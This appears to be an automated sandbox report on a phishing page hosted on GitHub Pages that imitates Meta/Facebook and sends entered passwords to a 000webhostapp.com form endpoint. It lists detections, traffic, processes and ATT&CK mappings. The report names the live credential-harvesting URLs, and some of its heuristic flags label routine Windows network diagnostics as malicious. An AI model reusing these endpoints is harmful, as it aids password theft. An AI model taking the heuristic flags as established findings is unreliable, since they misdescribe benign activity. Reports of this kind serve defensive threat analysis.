Edit tour

Windows Analysis Report
http://remove-restriction.github.io/input-pass

Overview

General Information

Sample URL:	http://remove-restriction.github.io/input-pass
Analysis ID:	1607942
Infos:

Detection

Score:	68
Range:	0 - 100
Confidence:	100%

Signatures

AI detected phishing page

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Uses netsh to modify the Windows network and firewall settings

Binary contains a suspicious time stamp

Drops PE files

Drops PE files to the windows directory (C:\Windows)

Form action URLs do not match main URL

Found dropped PE file which has not been started or loaded

HTML body contains low number of good links

HTML title does not match URL

PE file does not import any functions

Queries the volume information (name, serial number etc) of a device

Suspicious form URL found

Classification

×

Process Tree

System is w10x64

chrome.exe (PID: 5472 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 6036 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2516 --field-trial-handle=2444,i,5468127952651942022,16810805013983279297,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

msdt.exe (PID: 6428 cmdline: -modal "262222" -skip TRUE -path "C:\Windows\diagnostics\system\networking" -af "C:\Users\user\AppData\Local\Temp\NDF2684.tmp" -ep "NetworkDiagnosticsWeb" MD5: 3AE6BFDF0257B303EDD695DA183C8462)

chrome.exe (PID: 6560 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://remove-restriction.github.io/input-pass" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

netsh.exe (PID: 6252 cmdline: "C:\Windows\system32\netsh.exe" trace diagnose Scenario=NetworkSnapshot Mode=NetTroubleshooter MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)

cleanup

Malware Configuration

⊘No configs have been found

Yara Signatures

⊘No yara matches

Sigma Signatures

⊘No Sigma rule has matched

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

• AV Detection
• Phishing
• Compliance
• Networking
• System Summary
• Data Obfuscation
• Persistence and Installation Behavior
• Hooking and other Techniques for Hiding and Protection
• Malware Analysis System Evasion
• Language, Device and Operating System Detection
• Lowering of HIPS / PFW / Operating System Security Settings

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: http://remove-restriction.github.io/input-pass

Avira URL Cloud: detection malicious, Label: phishing

Antivirus detection for URL or domain

Source: https://remove-restriction.github.io/input-pass	Avira URL Cloud: Label: phishing
Source: https://remove-restriction.github.io/input-pass/style.css	Avira URL Cloud: Label: phishing
Source: https://remove-restriction.github.io/input-pass/favicon.ico	Avira URL Cloud: Label: phishing
Source: https://remove-restriction.github.io/input-pass/interview.css	Avira URL Cloud: Label: phishing

Phishing

AI detected phishing page

Source: https://remove-restriction.github.io/input-pass/

Joe Sandbox AI: Score: 9 Reasons: The brand 'Meta' is well-known and is associated with the legitimate domain 'meta.com'., The URL 'remove-restriction.github.io' does not match the legitimate domain for Meta., The use of 'github.io' suggests a GitHub Pages site, which is often used for personal or project pages, not official brand sites., The presence of 'remove-restriction' in the URL is suspicious and not related to Meta's official services., The input field for 'Password' on a non-official domain is a common phishing tactic to capture sensitive information. DOM: 1.0.pages.csv

Source: https://remove-restriction.github.io/input-pass/

HTTP Parser: Form action: https://practiced-dockings.000webhostapp.com/new/add.php github 000webhostapp

Source: https://remove-restriction.github.io/input-pass/

HTTP Parser: Number of links: 0

Source: https://remove-restriction.github.io/input-pass/

HTTP Parser: Title: Restrictions Information does not match URL

Source: https://remove-restriction.github.io/input-pass/

HTTP Parser: Form action: https://practiced-dockings.000webhostapp.com/new/add.php

Source: https://remove-restriction.github.io/input-pass/

HTTP Parser: <input type="password" .../> found

Source: https://remove-restriction.github.io/input-pass/

HTTP Parser: No <meta name="author".. found

Source: https://remove-restriction.github.io/input-pass/

HTTP Parser: No <meta name="copyright".. found

Source:

Binary string: NetworkDiagnosticSnapIn.pdb source: NetworkDiagnosticSnapIn.dll.7.dr

Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown	TCP traffic detected without corresponding DNS query: 2.22.50.110
Source: unknown	TCP traffic detected without corresponding DNS query: 2.22.50.110
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.214.172
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.214.172
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /input-pass HTTP/1.1Host: remove-restriction.github.ioConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /input-pass/ HTTP/1.1Host: remove-restriction.github.ioConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /input-pass/style.css HTTP/1.1Host: remove-restriction.github.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,/;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://remove-restriction.github.io/input-pass/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /input-pass/interview.css HTTP/1.1Host: remove-restriction.github.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,/;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://remove-restriction.github.io/input-pass/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /images/fb_icon_325x325.png HTTP/1.1Host: www.facebook.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://remove-restriction.github.io/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /input-pass/favicon.ico HTTP/1.1Host: remove-restriction.github.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://remove-restriction.github.io/input-pass/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /images/fb_icon_325x325.png HTTP/1.1Host: www.facebook.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /input-pass HTTP/1.1Host: remove-restriction.github.ioConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9

Source: chromecache_64.2.dr

String found in binary or memory: <center><img alt="" src="https://www.facebook.com/images/fb_icon_325x325.png" width="20%"><br> equals www.facebook.com (Facebook)

Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: remove-restriction.github.io
Source: global traffic	DNS traffic detected: DNS query: www.facebook.com
Source: global traffic	DNS traffic detected: DNS query: practiced-dockings.000webhostapp.com
Source: global traffic	DNS traffic detected: DNS query: google.com

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeContent-Length: 9379Server: GitHub.comContent-Type: text/html; charset=utf-8permissions-policy: interest-cohort=()x-origin-cache: HITAccess-Control-Allow-Origin: *Strict-Transport-Security: max-age=31556952ETag: "64d39a40-24a3"Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; img-src data:; connect-src 'self'x-proxy-cache: MISSX-GitHub-Request-Id: E826:C95D3:D6B60B:EC31FE:67A4055EAccept-Ranges: bytesAge: 0Date: Thu, 06 Feb 2025 00:42:07 GMTVia: 1.1 varnishX-Served-By: cache-ewr-kewr1740066-EWRX-Cache: MISSX-Cache-Hits: 0X-Timer: S1738802528.528647,VS0,VE13Vary: Accept-EncodingX-Fastly-Request-ID: ba02ae0a8d92da966f8213e478af6ff0891fa3e6

Source: chromecache_63.2.dr	String found in binary or memory: https://githubstatus.com
Source: chromecache_63.2.dr	String found in binary or memory: https://help.github.com/pages/
Source: chromecache_64.2.dr	String found in binary or memory: https://practiced-dockings.000webhostapp.com/new/add.php
Source: chromecache_64.2.dr	String found in binary or memory: https://remove-restriction.github.io/input-pass/interview.css
Source: chromecache_64.2.dr	String found in binary or memory: https://remove-restriction.github.io/input-pass/style.css
Source: chromecache_62.2.dr	String found in binary or memory: https://static.xx.fbcdn.net/rsrc.php/v3/yH/r/xgVgalBG80z.png);height:24px;width:24px
Source: chromecache_64.2.dr	String found in binary or memory: https://static.xx.fbcdn.net/rsrc.php/yb/r/hLRJ1GG_y0J.ico
Source: chromecache_63.2.dr	String found in binary or memory: https://twitter.com/githubstatus

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49820
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 49820 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745

Source: DiagPackage.dll.mui.7.dr	Static PE information: No import functions for PE file found
Source: DiagPackage.dll.7.dr	Static PE information: No import functions for PE file found

Source: classification engine

Classification label: mal68.phis.evad.win@22/28@26/7

Source: C:\Windows\System32\msdt.exe

File created: C:\Users\user\AppData\Local\Temp\msdtadmin

Jump to behavior

Source: C:\Windows\System32\msdt.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2516 --field-trial-handle=2444,i,5468127952651942022,16810805013983279297,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://remove-restriction.github.io/input-pass"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Windows\System32\msdt.exe -modal "262222" -skip TRUE -path "C:\Windows\diagnostics\system\networking" -af "C:\Users\user\AppData\Local\Temp\NDF2684.tmp" -ep "NetworkDiagnosticsWeb"
Source: unknown	Process created: C:\Windows\System32\netsh.exe "C:\Windows\system32\netsh.exe" trace diagnose Scenario=NetworkSnapshot Mode=NetTroubleshooter
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2516 --field-trial-handle=2444,i,5468127952651942022,16810805013983279297,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Windows\System32\msdt.exe -modal "262222" -skip TRUE -path "C:\Windows\diagnostics\system\networking" -af "C:\Users\user\AppData\Local\Temp\NDF2684.tmp" -ep "NetworkDiagnosticsWeb"			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior

Source: C:\Windows\System32\netsh.exe	Section loaded: kernel.appcore.dll			Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: ifmon.dll			Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: iphlpapi.dll			Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: mprapi.dll			Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: rasmontr.dll			Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: rasapi32.dll			Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: fwpuclnt.dll			Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: rasman.dll			Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: mfc42u.dll			Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: rasman.dll			Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: authfwcfg.dll			Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: fwpolicyiomgr.dll			Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: firewallapi.dll			Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: dnsapi.dll			Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: fwbase.dll			Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: dhcpcmonitor.dll			Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: dot3cfg.dll			Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: dot3api.dll			Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: onex.dll			Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: eappcfg.dll			Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: ncrypt.dll			Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: eappprxy.dll			Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: ntasn1.dll			Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: fwcfg.dll			Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: hnetmon.dll			Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: netshell.dll			Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: nlaapi.dll			Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: netsetupapi.dll			Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: netiohlp.dll			Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: dhcpcsvc.dll			Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: winnsi.dll			Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: nettrace.dll			Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: sspicli.dll			Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: nshhttp.dll			Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: httpapi.dll			Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: nshipsec.dll			Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: userenv.dll			Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: activeds.dll			Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: polstore.dll			Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: winipsec.dll			Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: adsldpc.dll			Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: adsldpc.dll			Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: nshwfp.dll			Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: cabinet.dll			Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: p2pnetsh.dll			Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: p2p.dll			Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: profapi.dll			Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: cryptbase.dll			Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: rpcnsh.dll			Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: wcnnetsh.dll			Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: wlanapi.dll			Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: whhelper.dll			Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: winhttp.dll			Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: wlancfg.dll			Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: cryptsp.dll			Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: wshelper.dll			Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: wevtapi.dll			Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: mswsock.dll			Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: wwancfg.dll			Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: wwapi.dll			Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: wcmapi.dll			Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: rmclient.dll			Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: mobilenetworking.dll			Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: peerdistsh.dll			Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: uxtheme.dll			Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: slc.dll			Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: sppc.dll			Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: gpapi.dll			Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: ktmw32.dll			Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: mprmsg.dll			Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: nettraceex.dll			Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: ndfapi.dll			Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: tdh.dll			Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: wdi.dll			Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: windows.storage.dll			Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: wldp.dll			Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: msasn1.dll			Jump to behavior

Source: C:\Windows\System32\msdt.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{88d96a05-f192-11d4-a65f-0040963251e5}\InProcServer32

Jump to behavior

Source: C:\Windows\System32\msdt.exe

File opened: C:\Windows\system32\MSFTEDIT.DLL

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source:

Binary string: NetworkDiagnosticSnapIn.pdb source: NetworkDiagnosticSnapIn.dll.7.dr

Source: DiagPackage.dll.7.dr

Static PE information: 0xB6DD46AC [Mon Mar 21 17:41:00 2067 UTC]

Source: C:\Windows\System32\msdt.exe	File created: C:\Windows\Temp\SDIAG_de393dd0-72da-475e-8a66-4aa6ac432fe2\DiagPackage.dll			Jump to dropped file
Source: C:\Windows\System32\msdt.exe	File created: C:\Windows\Temp\SDIAG_de393dd0-72da-475e-8a66-4aa6ac432fe2\en-GB\DiagPackage.dll.mui			Jump to dropped file
Source: C:\Windows\System32\msdt.exe	File created: C:\Windows\Temp\SDIAG_de393dd0-72da-475e-8a66-4aa6ac432fe2\NetworkDiagnosticSnapIn.dll			Jump to dropped file

Source: C:\Windows\System32\msdt.exe	File created: C:\Windows\Temp\SDIAG_de393dd0-72da-475e-8a66-4aa6ac432fe2\DiagPackage.dll			Jump to dropped file
Source: C:\Windows\System32\msdt.exe	File created: C:\Windows\Temp\SDIAG_de393dd0-72da-475e-8a66-4aa6ac432fe2\en-GB\DiagPackage.dll.mui			Jump to dropped file
Source: C:\Windows\System32\msdt.exe	File created: C:\Windows\Temp\SDIAG_de393dd0-72da-475e-8a66-4aa6ac432fe2\NetworkDiagnosticSnapIn.dll			Jump to dropped file

Source: C:\Windows\System32\msdt.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\msdt.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\msdt.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\msdt.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\netsh.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\netsh.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior

Source: C:\Windows\System32\msdt.exe	Dropped PE file which has not been started: C:\Windows\Temp\SDIAG_de393dd0-72da-475e-8a66-4aa6ac432fe2\DiagPackage.dll			Jump to dropped file
Source: C:\Windows\System32\msdt.exe	Dropped PE file which has not been started: C:\Windows\Temp\SDIAG_de393dd0-72da-475e-8a66-4aa6ac432fe2\en-GB\DiagPackage.dll.mui			Jump to dropped file
Source: C:\Windows\System32\msdt.exe	Dropped PE file which has not been started: C:\Windows\Temp\SDIAG_de393dd0-72da-475e-8a66-4aa6ac432fe2\NetworkDiagnosticSnapIn.dll			Jump to dropped file

Source: netsh.exe, 0000000A.00000003.2150262920.000001F22DE74000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\System32\msdt.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0316~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation			Jump to behavior
Source: C:\Windows\System32\netsh.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior

Source: C:\Windows\System32\msdt.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Uses netsh to modify the Windows network and firewall settings

Source: unknown

Process created: C:\Windows\System32\netsh.exe "C:\Windows\system32\netsh.exe" trace diagnose Scenario=NetworkSnapshot Mode=NetTroubleshooter

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	1 DLL Side-Loading	1 Process Injection	1 Masquerading	OS Credential Dumping	1 Security Software Discovery	Remote Services	Data from Local System	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
